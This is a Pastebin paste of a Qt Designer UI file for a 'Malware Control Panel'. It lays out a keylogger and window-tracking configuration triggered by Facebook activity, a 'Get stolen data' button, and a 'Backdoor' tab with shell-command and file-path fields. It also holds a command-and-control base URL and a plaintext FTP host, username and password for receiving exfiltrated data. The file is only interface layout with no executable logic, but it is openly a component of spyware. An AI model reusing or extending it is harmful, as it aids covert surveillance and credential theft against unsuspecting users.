Advertisement
FlyFar

gui/gui.ui

Aug 10th, 2023
1,357
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 10.19 KB | Cybersecurity | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <ui version="4.0">
  3.  <class>Dialog</class>
  4.  <widget class="QDialog" name="Dialog">
  5.   <property name="geometry">
  6.    <rect>
  7.     <x>0</x>
  8.     <y>0</y>
  9.     <width>819</width>
  10.     <height>668</height>
  11.    </rect>
  12.   </property>
  13.   <property name="windowTitle">
  14.    <string>Dialog</string>
  15.   </property>
  16.   <widget class="QLabel" name="label">
  17.    <property name="geometry">
  18.     <rect>
  19.      <x>180</x>
  20.      <y>20</y>
  21.      <width>481</width>
  22.      <height>61</height>
  23.     </rect>
  24.    </property>
  25.    <property name="font">
  26.     <font>
  27.      <family>Ubuntu Condensed</family>
  28.      <pointsize>43</pointsize>
  29.      <weight>75</weight>
  30.      <italic>false</italic>
  31.      <bold>true</bold>
  32.     </font>
  33.    </property>
  34.    <property name="text">
  35.     <string>Malware Control Panel</string>
  36.    </property>
  37.   </widget>
  38.   <widget class="QTabWidget" name="tabWidget">
  39.    <property name="geometry">
  40.     <rect>
  41.      <x>120</x>
  42.      <y>120</y>
  43.      <width>581</width>
  44.      <height>491</height>
  45.     </rect>
  46.    </property>
  47.    <property name="currentIndex">
  48.     <number>0</number>
  49.    </property>
  50.    <widget class="QWidget" name="tab">
  51.     <attribute name="title">
  52.      <string>Tab 1</string>
  53.     </attribute>
  54.     <widget class="QPushButton" name="wakeup">
  55.      <property name="geometry">
  56.       <rect>
  57.        <x>170</x>
  58.        <y>100</y>
  59.        <width>231</width>
  60.        <height>41</height>
  61.       </rect>
  62.      </property>
  63.      <property name="font">
  64.       <font>
  65.        <pointsize>17</pointsize>
  66.       </font>
  67.      </property>
  68.      <property name="text">
  69.       <string>Ellácska, wake up!!!</string>
  70.      </property>
  71.     </widget>
  72.     <widget class="QPushButton" name="sendconfig">
  73.      <property name="geometry">
  74.       <rect>
  75.        <x>170</x>
  76.        <y>190</y>
  77.        <width>231</width>
  78.        <height>41</height>
  79.       </rect>
  80.      </property>
  81.      <property name="font">
  82.       <font>
  83.        <pointsize>16</pointsize>
  84.       </font>
  85.      </property>
  86.      <property name="text">
  87.       <string>Send config data!!!</string>
  88.      </property>
  89.     </widget>
  90.     <widget class="QPushButton" name="getftp">
  91.      <property name="geometry">
  92.       <rect>
  93.        <x>170</x>
  94.        <y>280</y>
  95.        <width>231</width>
  96.        <height>41</height>
  97.       </rect>
  98.      </property>
  99.      <property name="font">
  100.       <font>
  101.        <pointsize>16</pointsize>
  102.       </font>
  103.      </property>
  104.      <property name="text">
  105.       <string>Get stolen data!!!</string>
  106.      </property>
  107.     </widget>
  108.    </widget>
  109.    <widget class="QWidget" name="tab_2">
  110.     <attribute name="title">
  111.      <string>Tab 2</string>
  112.     </attribute>
  113.     <widget class="QWidget" name="formLayoutWidget">
  114.      <property name="geometry">
  115.       <rect>
  116.        <x>120</x>
  117.        <y>130</y>
  118.        <width>311</width>
  119.        <height>231</height>
  120.       </rect>
  121.      </property>
  122.      <layout class="QFormLayout" name="formLayout">
  123.       <item row="0" column="0">
  124.        <widget class="QCheckBox" name="keylogger">
  125.         <property name="text">
  126.          <string>Keylogging</string>
  127.         </property>
  128.         <property name="checked">
  129.          <bool>true</bool>
  130.         </property>
  131.        </widget>
  132.       </item>
  133.       <item row="0" column="1">
  134.        <widget class="QCheckBox" name="tracker">
  135.         <property name="text">
  136.          <string>Window Tracking</string>
  137.         </property>
  138.         <property name="checked">
  139.          <bool>true</bool>
  140.         </property>
  141.        </widget>
  142.       </item>
  143.       <item row="3" column="0">
  144.        <widget class="QLabel" name="samplingFrequencyLabel">
  145.         <property name="text">
  146.          <string>Sampling Frequency</string>
  147.         </property>
  148.        </widget>
  149.       </item>
  150.       <item row="3" column="1">
  151.        <widget class="QLineEdit" name="trackfreq">
  152.         <property name="text">
  153.          <string>0.1</string>
  154.         </property>
  155.        </widget>
  156.       </item>
  157.       <item row="4" column="0">
  158.        <widget class="QLabel" name="screenshotFrequencyLabel">
  159.         <property name="text">
  160.          <string>Screenshot Frequency</string>
  161.         </property>
  162.        </widget>
  163.       </item>
  164.       <item row="4" column="1">
  165.        <widget class="QLineEdit" name="screenshotfreq">
  166.         <property name="text">
  167.          <string>50</string>
  168.         </property>
  169.        </widget>
  170.       </item>
  171.       <item row="5" column="0">
  172.        <widget class="QLabel" name="screenshotTriggerLabel">
  173.         <property name="text">
  174.          <string>Screenshot Triggers</string>
  175.         </property>
  176.        </widget>
  177.       </item>
  178.       <item row="5" column="1">
  179.        <widget class="QLineEdit" name="triggers">
  180.         <property name="text">
  181.          <string>facebook</string>
  182.         </property>
  183.        </widget>
  184.       </item>
  185.       <item row="2" column="0">
  186.        <widget class="QCheckBox" name="debugmode">
  187.         <property name="text">
  188.          <string>Debug</string>
  189.         </property>
  190.         <property name="checked">
  191.          <bool>true</bool>
  192.         </property>
  193.        </widget>
  194.       </item>
  195.      </layout>
  196.     </widget>
  197.     <widget class="QLabel" name="label_2">
  198.      <property name="geometry">
  199.       <rect>
  200.        <x>120</x>
  201.        <y>60</y>
  202.        <width>321</width>
  203.        <height>31</height>
  204.       </rect>
  205.      </property>
  206.      <property name="font">
  207.       <font>
  208.        <pointsize>17</pointsize>
  209.       </font>
  210.      </property>
  211.      <property name="text">
  212.       <string>Window tracking &amp; Keylogging</string>
  213.      </property>
  214.     </widget>
  215.    </widget>
  216.    <widget class="QWidget" name="tab_3">
  217.     <attribute name="title">
  218.      <string>Page</string>
  219.     </attribute>
  220.     <widget class="QWidget" name="formLayoutWidget_2">
  221.      <property name="geometry">
  222.       <rect>
  223.        <x>20</x>
  224.        <y>120</y>
  225.        <width>541</width>
  226.        <height>201</height>
  227.       </rect>
  228.      </property>
  229.      <layout class="QFormLayout" name="formLayout_2">
  230.       <item row="1" column="0">
  231.        <widget class="QLabel" name="samplingFrequencyLabel_2">
  232.         <property name="text">
  233.          <string>Base URL</string>
  234.         </property>
  235.        </widget>
  236.       </item>
  237.       <item row="1" column="1">
  238.        <widget class="QLineEdit" name="baseurl">
  239.         <property name="text">
  240.          <string>http://facebook-user-profile.herokuapp.com/malware</string>
  241.         </property>
  242.        </widget>
  243.       </item>
  244.       <item row="2" column="0">
  245.        <widget class="QLabel" name="screenshotFrequencyLabel_2">
  246.         <property name="text">
  247.          <string>FTP:</string>
  248.         </property>
  249.        </widget>
  250.       </item>
  251.       <item row="2" column="1">
  252.        <widget class="QLineEdit" name="ftpurl">
  253.         <property name="text">
  254.          <string>ftp.atw.hu</string>
  255.         </property>
  256.        </widget>
  257.       </item>
  258.       <item row="3" column="0">
  259.        <widget class="QLabel" name="screenshotTriggerLabel_2">
  260.         <property name="text">
  261.          <string>FTP user</string>
  262.         </property>
  263.        </widget>
  264.       </item>
  265.       <item row="3" column="1">
  266.        <widget class="QLineEdit" name="ftpuser">
  267.         <property name="text">
  268.          <string>kiserletimuto</string>
  269.         </property>
  270.        </widget>
  271.       </item>
  272.       <item row="4" column="0">
  273.        <widget class="QLabel" name="fTPPassLabel">
  274.         <property name="text">
  275.          <string>FTP pass</string>
  276.         </property>
  277.        </widget>
  278.       </item>
  279.       <item row="4" column="1">
  280.        <widget class="QLineEdit" name="ftppass">
  281.         <property name="text">
  282.          <string>patti</string>
  283.         </property>
  284.        </widget>
  285.       </item>
  286.       <item row="5" column="0">
  287.        <widget class="QLabel" name="fCommLabel">
  288.         <property name="text">
  289.          <string>Comm freq</string>
  290.         </property>
  291.        </widget>
  292.       </item>
  293.       <item row="5" column="1">
  294.        <widget class="QLineEdit" name="commfreq">
  295.         <property name="text">
  296.          <string>900</string>
  297.         </property>
  298.        </widget>
  299.       </item>
  300.      </layout>
  301.     </widget>
  302.     <widget class="QLabel" name="label_3">
  303.      <property name="geometry">
  304.       <rect>
  305.        <x>170</x>
  306.        <y>60</y>
  307.        <width>251</width>
  308.        <height>17</height>
  309.       </rect>
  310.      </property>
  311.      <property name="font">
  312.       <font>
  313.        <pointsize>17</pointsize>
  314.       </font>
  315.      </property>
  316.      <property name="text">
  317.       <string>Server Communication</string>
  318.      </property>
  319.     </widget>
  320.    </widget>
  321.    <widget class="QWidget" name="tab_4">
  322.     <attribute name="title">
  323.      <string>Page</string>
  324.     </attribute>
  325.     <widget class="QLabel" name="label_4">
  326.      <property name="geometry">
  327.       <rect>
  328.        <x>230</x>
  329.        <y>60</y>
  330.        <width>101</width>
  331.        <height>31</height>
  332.       </rect>
  333.      </property>
  334.      <property name="font">
  335.       <font>
  336.        <pointsize>17</pointsize>
  337.       </font>
  338.      </property>
  339.      <property name="text">
  340.       <string>Backdoor </string>
  341.      </property>
  342.     </widget>
  343.     <widget class="QWidget" name="formLayoutWidget_3">
  344.      <property name="geometry">
  345.       <rect>
  346.        <x>20</x>
  347.        <y>140</y>
  348.        <width>541</width>
  349.        <height>81</height>
  350.       </rect>
  351.      </property>
  352.      <layout class="QFormLayout" name="formLayout_3">
  353.       <item row="1" column="0">
  354.        <widget class="QLabel" name="samplingFrequencyLabel_3">
  355.         <property name="text">
  356.          <string>Shell command</string>
  357.         </property>
  358.        </widget>
  359.       </item>
  360.       <item row="1" column="1">
  361.        <widget class="QLineEdit" name="shellcommand">
  362.         <property name="text">
  363.          <string/>
  364.         </property>
  365.        </widget>
  366.       </item>
  367.       <item row="2" column="0">
  368.        <widget class="QLabel" name="screenshotFrequencyLabel_3">
  369.         <property name="text">
  370.          <string>File Path</string>
  371.         </property>
  372.        </widget>
  373.       </item>
  374.       <item row="2" column="1">
  375.        <widget class="QLineEdit" name="filepath">
  376.         <property name="text">
  377.          <string/>
  378.         </property>
  379.        </widget>
  380.       </item>
  381.      </layout>
  382.     </widget>
  383.    </widget>
  384.   </widget>
  385.  </widget>
  386.  <resources/>
  387.  <connections/>
  388. </ui>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement